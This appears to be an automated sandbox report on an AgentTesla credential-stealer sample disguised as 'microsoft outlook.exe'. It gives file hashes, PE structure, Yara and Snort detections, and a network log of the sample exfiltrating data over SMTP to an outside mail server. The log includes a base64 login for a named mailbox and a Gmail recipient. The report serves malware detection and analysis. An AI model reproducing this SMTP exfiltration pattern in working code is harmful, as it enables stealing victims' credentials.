                            Preview: # Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                            Static File Info

                            General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.485101457153222
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: microsoft outlook.exe
File size: 577999
MD5: 483994a69d86ec2e58ff6468cf049f89
SHA1: 36b1d5e58de9734faa40fe218e415c57e902292e
SHA256: a51cdfc1b836895069dc0e2d8b7e15e13c65714d44278add6ab306061cdbc0c8
SHA512: 006d7d6afa0dfd03f510dd2d19fd713e66a4bb046bd9ceb65390e8f536709705083dbf4a1f279243eb798737500cc72bd71f52ce110d2b6576b7aeac1d5f6c01
SSDEEP: 12288:XdY27/O+fL4gy/LBIIvrn5wHUK7wobeAp44kjOYFB3GaeE4a:X//O+j47/L2IvrnMwtApNGOYFB3GaeEp
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                            File Icon

Icon Hash: dcd8dbdaac98d2d0

                            Static PE Info

                            General

Entrypoint: 0x4030e3
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 7fa974366048f9c551ef45714595665e

                            Entrypoint Preview

                            Instruction
                            sub esp, 00000180h
                            push ebx
                            push ebp
                            push esi
                            xor ebx, ebx
                            push edi
                            mov dword ptr [esp+18h], ebx
                            mov dword ptr [esp+10h], 00409158h
                            xor esi, esi
                            mov byte ptr [esp+14h], 00000020h
                            call dword ptr [00407030h]
                            push 00008001h
                            call dword ptr [004070B0h]
                            push ebx
                            call dword ptr [0040727Ch]
                            push 00000008h
                            mov dword ptr [0042EC18h], eax
                            call 00007F05BC964F28h
                            mov dword ptr [0042EB64h], eax
                            push ebx
                            lea eax, dword ptr [esp+34h]
                            push 00000160h
                            push eax
                            push ebx
                            push 00428F90h
                            call dword ptr [00407158h]
                            push 0040914Ch
                            push 0042E360h
                            call 00007F05BC964BDFh
                            call dword ptr [004070ACh]
                            mov edi, 00434000h
                            push eax
                            push edi
                            call 00007F05BC964BCDh
                            push ebx
                            call dword ptr [0040710Ch]
                            cmp byte ptr [00434000h], 00000022h
                            mov dword ptr [0042EB60h], eax
                            mov eax, edi
                            jne 00007F05BC96240Ch
                            mov byte ptr [esp+14h], 00000022h
                            mov eax, 00434001h
                            push dword ptr [esp+14h]
                            push eax
                            call 00007F05BC9646C0h
                            push eax
                            call dword ptr [0040721Ch]
                            mov dword ptr [esp+1Ch], eax
                            jmp 00007F05BC962465h
                            cmp cl, 00000020h
                            jne 00007F05BC962408h
                            inc eax
                            cmp byte ptr [eax], 00000020h
                            je 00007F05BC9623FCh
                            cmp byte ptr [eax], 00000022h
                            mov byte ptr [eax+eax+00h], 00000000h

                            Rich Headers

                            Programming Language:
                            • [EXP] VC++ 6.0 SP5 build 8804

                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74b0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x27f88 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                            Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5b68 | 0x5c00 | False | 0.67722486413 | data | 6.48746502716 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x129c | 0x1400 | False | 0.4337890625 | data | 5.04904254867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x25c58 | 0x400 | False | 0.58203125 | data | 4.76995537906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x37000 | 0x27f88 | 0x28000 | False | 0.334106445312 | data | 5.53647255605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x372e0 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x47b08 | 0x94a8 | data | English | United States
RT_ICON | 0x50fb0 | 0x5488 | data | English | United States
RT_ICON | 0x56438 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 248, next used block 520093696 | English | United States
RT_ICON | 0x5a660 | 0x25a8 | data | English | United States
RT_ICON | 0x5cc08 | 0x10a8 | data | English | United States
RT_ICON | 0x5dcb0 | 0x988 | data | English | United States
RT_ICON | 0x5e638 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x5eaa0 | 0x100 | data | English | United States
RT_DIALOG | 0x5eba0 | 0x11c | data | English | United States
RT_DIALOG | 0x5ecc0 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x5ed20 | 0x76 | data | English | United States
RT_MANIFEST | 0x5ed98 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                            Imports

DLL | Imports
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                            Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                            Network Behavior

                            Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/14/22-15:09:05.620179 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49814 | 587 | 192.168.2.3 | 192.185.25.212

                            Network Port Distribution

                            TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 14, 2022 15:09:01.728858948 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:01.870594978 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:01.870759964 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:04.714140892 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:04.715786934 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:04.857770920 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:04.860090017 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.002394915 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.003014088 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.147367954 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.149938107 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.291701078 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.292252064 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.474204063 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.476167917 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.476649046 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.618309975 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.618387938 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.620178938 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.620332003 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.620893955 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.620975018 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212
Jan 14, 2022 15:09:05.762295961 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.762422085 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.763362885 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3
Jan 14, 2022 15:09:05.808962107 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jan 14, 2022 15:09:01.313389063 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
                            Jan 14, 2022 15:09:01.467282057 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
                            Jan 14, 2022 15:09:01.485635996 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
                            Jan 14, 2022 15:09:01.656233072 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Jan 14, 2022 15:09:01.313389063 CET | 192.168.2.3 | 8.8.8.8 | 0xd612 | Standard query (0) | mail.cgyasc.com | A (IP address) | IN (0x0001)
                            Jan 14, 2022 15:09:01.485635996 CET | 192.168.2.3 | 8.8.8.8 | 0x3db3 | Standard query (0) | mail.cgyasc.com | A (IP address) | IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Jan 14, 2022 15:09:01.467282057 CET | 8.8.8.8 | 192.168.2.3 | 0xd612 | No error (0) | mail.cgyasc.com | cgyasc.com | | CNAME (Canonical name) | IN (0x0001)
                            Jan 14, 2022 15:09:01.467282057 CET | 8.8.8.8 | 192.168.2.3 | 0xd612 | No error (0) | cgyasc.com | | 192.185.25.212 | A (IP address) | IN (0x0001)
                            Jan 14, 2022 15:09:01.656233072 CET | 8.8.8.8 | 192.168.2.3 | 0x3db3 | No error (0) | mail.cgyasc.com | cgyasc.com | | CNAME (Canonical name) | IN (0x0001)
                            Jan 14, 2022 15:09:01.656233072 CET | 8.8.8.8 | 192.168.2.3 | 0x3db3 | No error (0) | cgyasc.com | | 192.185.25.212 | A (IP address) | IN (0x0001)

                            SMTP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                            Jan 14, 2022 15:09:04.714140892 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 220-elise.websitewelcome.com ESMTP Exim 4.94.2 #2 Fri, 14 Jan 2022 08:09:04 -0600
                                220-We do not authorize the use of this system to transport unsolicited,
                                220 and/or bulk e-mail.
                            Jan 14, 2022 15:09:04.715786934 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | EHLO 172892
                            Jan 14, 2022 15:09:04.857770920 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 250-elise.websitewelcome.com Hello 172892 [84.17.52.18]
                                250-SIZE 52428800
                                250-8BITMIME
                                250-PIPELINING
                                250-PIPE_CONNECT
                                250-AUTH PLAIN LOGIN
                                250-STARTTLS
                                250 HELP
                            Jan 14, 2022 15:09:04.860090017 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | AUTH login Y2FzdGlsbG9vQGNneWFzYy5jb20=
                            Jan 14, 2022 15:09:05.002394915 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 334 UGFzc3dvcmQ6
                            Jan 14, 2022 15:09:05.147367954 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 235 Authentication succeeded
                            Jan 14, 2022 15:09:05.149938107 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | MAIL FROM:<castilloo@cgyasc.com>
                            Jan 14, 2022 15:09:05.291701078 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 250 OK
                            Jan 14, 2022 15:09:05.292252064 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | RCPT TO:<mamaputmamaput175@gmail.com>
                            Jan 14, 2022 15:09:05.476167917 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 250 Accepted
                            Jan 14, 2022 15:09:05.476649046 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | DATA
                            Jan 14, 2022 15:09:05.618387938 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
                            Jan 14, 2022 15:09:05.620975018 CET | 49814 | 587 | 192.168.2.3 | 192.185.25.212 | .
                            Jan 14, 2022 15:09:05.763362885 CET | 587 | 49814 | 192.185.25.212 | 192.168.2.3 | 250 OK id=1n8NGL-000oD2-Hb

                            Code Manipulations

                            Statistics

                            Behavior

                            System Behavior

                            General

                            Start time: 15:07:16
                            Start date: 14/01/2022
                            Path: C:\Users\user\Desktop\microsoft outlook.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\microsoft outlook.exe"
                            Imagebase: 0x400000
                            File size: 577999 bytes
                            MD5 hash: 483994A69D86EC2E58FF6468CF049F89
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.300252799.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                            Reputation: low

                            General

                            Start time: 15:07:17
                            Start date: 14/01/2022
                            Path: C:\Users\user\Desktop\microsoft outlook.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\microsoft outlook.exe"
                            Imagebase: 0x400000
                            File size: 577999 bytes
                            MD5 hash: 483994A69D86EC2E58FF6468CF049F89
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: .Net C# or VB.NET
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.297608589.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561417373.00000000049A2000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561213079.0000000003511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.298689668.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000001.299532186.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.561338501.0000000004950000.00000004.00020000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.558241910.00000000004CA000.00000004.00000020.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.560204130.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.557953046.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                            Reputation: low

                            Disassembly

                            Code Analysis
